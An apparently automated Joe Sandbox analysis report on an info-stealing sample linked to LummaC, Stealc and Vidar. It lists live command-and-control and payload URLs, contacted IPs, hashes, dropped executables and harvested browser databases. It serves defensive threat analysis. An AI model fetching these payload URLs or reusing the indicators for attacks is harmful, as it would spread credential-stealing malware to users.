http://cowod.hopto.BFHIEG	RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.entrust.net/rpa03	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	AECAKE.3.dr	false		unknown
https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exe1kkkk1237658https://files.bloodqwe.shop/ldms/	RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	GCBFBG.3.dr	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.17.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop/FIECBGDG	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://files.bloodqwe.shop/2~	RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false		unknown
https://www.cloudflare.com/5xx-error-landing	RegAsm.exe, 0000000D.00000002.2667736054.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop/er	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop:443	RegAsm.exe, 0000001D.00000002.2971207252.000000000098E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop/i	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false		unknown
http://cowod.hopto.orgIEG	RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop/p	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.microsoft.c	GCGHJEBGHJ.exe, 00000008.00000002.2606018401.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop/:4	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop/w	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	GCBFBG.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false		unknown
https://www.entrust.net/rpa0	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop/ERg	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.167.90	bloodqwe.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521168
Start date and time:	2024-09-28 05:22:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@43/31@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 101 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:23:29	API Interceptor	3x Sleep call for process: RegAsm.exe modified
23:23:49	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.167.90	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
188.114.97.3	9q24V7OSys.exe	Get hash	malicious	FormBook	Browse	www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/mfctuvFf/download
	http://brawllstars.ru/	Get hash	malicious	HTMLPhisher	Browse	brawllstars.ru/
	http://aktiivasi-paylaterr.from-resmi.com/	Get hash	malicious	Unknown	Browse	aktiivasi-paylaterr.from-resmi.com/
	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	homker11.uebki.one/GeneratorTest.php
	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
offensivedzvju.shop	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	gZzI6gTYn4.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	U6b3tLFqN5.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	0UB3FIL25c.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
bloodqwe.shop	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.167.90
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.73.223
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.167.90
t.me	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	http://telgramsignal4.sg-host.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://cijjhanvmyuaolqiekcnplac.city-index.top/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://rutinqqwin.shop/	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	149.154.167.99
	http://emailmarketing.locaweb.com.br/accounts/194439/messages/3/clicks/14727/3/	Get hash	malicious	Unknown	Browse	50.6.152.208
	http://nftpack820.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	149.154.167.99
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	zlsXub68El.exe	Get hash	malicious	Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://att-online-2022.square.site/	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://bt-109213.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://purple352168.studio.site/	Get hash	malicious	Unknown	Browse	104.17.246.203
	http://telstra-106611.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://home-105055.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://bt-107495.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://cionzbazee-prozeel0g.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.0.150
	https://metamimsilogin.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://project-may10.pages.dev/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	172.66.44.124
	http://attnet-100642.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
TELEGRAMRU	http://www.beta-casinu.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://murata.agency/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://telegram-sex-naughty18.pages.dev/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	http://minimal-yocawe-cawe.vercel.app/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	http://feiji.pg-bw.com/	Get hash	malicious	Unknown	Browse	149.154.170.96
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	http://telgramsignal4.sg-host.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://telegeron.top/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	https://att-online-2022.square.site/	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://bt-109213.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://purple352168.studio.site/	Get hash	malicious	Unknown	Browse	104.17.246.203
	http://telstra-106611.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://home-105055.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://bt-107495.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://cionzbazee-prozeel0g.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.0.150
	https://metamimsilogin.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://project-may10.pages.dev/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	172.66.44.124
	http://attnet-100642.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
LIFELINK-ASRU	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	zlsXub68El.exe	Get hash	malicious	Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	https://palomaestro1211.github.io/microsoftlogin/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	188.114.97.3
	http://eastlink-100708.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://newmexicogov-my.sharepoint.com/:f:/g/personal/christine_fuller_newmexicogov_onmicrosoft_com/EoaWDUrKgw5NpxyRqgYpeMMB9xM6HiHeCt0mCjuvQCuY2A?e=Aa5N0v	Get hash	malicious	Unknown	Browse	188.114.97.3
	DEMANDA LABORAL.COM.exe	Get hash	malicious	AsyncRAT	Browse	188.114.97.3
	DEMANDA G.COM.exe	Get hash	malicious	AsyncRAT	Browse	188.114.97.3
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.167.90 149.154.167.99
	bind.aspx.exe	Get hash	malicious	Vidar	Browse	172.67.167.90 149.154.167.99
	useraccount.aspx.dll	Get hash	malicious	Matanbuchus	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	172.67.167.90 149.154.167.99
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.167.90 149.154.167.99
	SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe	Get hash	malicious	GuLoader	Browse	172.67.167.90 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\GCGHJEBGHJ.exe	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\IJKFHDBKFCAA\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	bind.aspx.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\GCGHJEBGHJ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	380456
Entropy (8bit):	7.98798922649988
Encrypted:	false
SSDEEP:	6144:zkNlqnxjFg6Bn/Q+Ge966uvZ3ImhmjPFYoyPcYdhXBawaHO3EO:zGexjXB7G73x3hgPiBPcYdjKHO3EO
MD5:	687846A623C1FE1DA95F0FA2FE4479DF
SHA1:	6609D10980800B669E723D4C660C421E27695A29
SHA-256:	BFC7B367D52504B184D127E385219006C1EFC7E985D608C000E5EB3A204FC779
SHA-512:	FE150D4F02532CA3D5AA37C6D14741A0A9C0290854AC6924DA282AD6585B47BF98E8443AA4281EA89788B8E906F8D11D49B3E88A11E10D4D67B6E2605004A9C3
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^.f............................~.... ........@.. ....................................`.................................0...K.......................(&........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H...........@..............................................................!^. .4..........nJ..../B..A.D.R...W........~.\..i........?.O9...dl..............h..h.`.P.w.s..=.J].}9.............k'E.V ....k..3..k{.f+..?..P.:..d.X..C;7\|..h/p.&.k.<.-G...w.:N...1U.6S...6.y...`m..o..+.....Z...Q.....J{.W .D)....tqb...z.x....#..x../v..y.......;.+..D?...w.Tq..N-.AM.@..~HI=e5..9F...k...{_......i[...R5.........}..m..c...L.S..G../V..:55T....E.}....I.....J......p..:..ze#o.

C:\ProgramData\IJKFHDBKFCAA\AECAKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\IJKFHDBKFCAA\CBFIJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\CGIDAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\GCBFBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\GHIJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
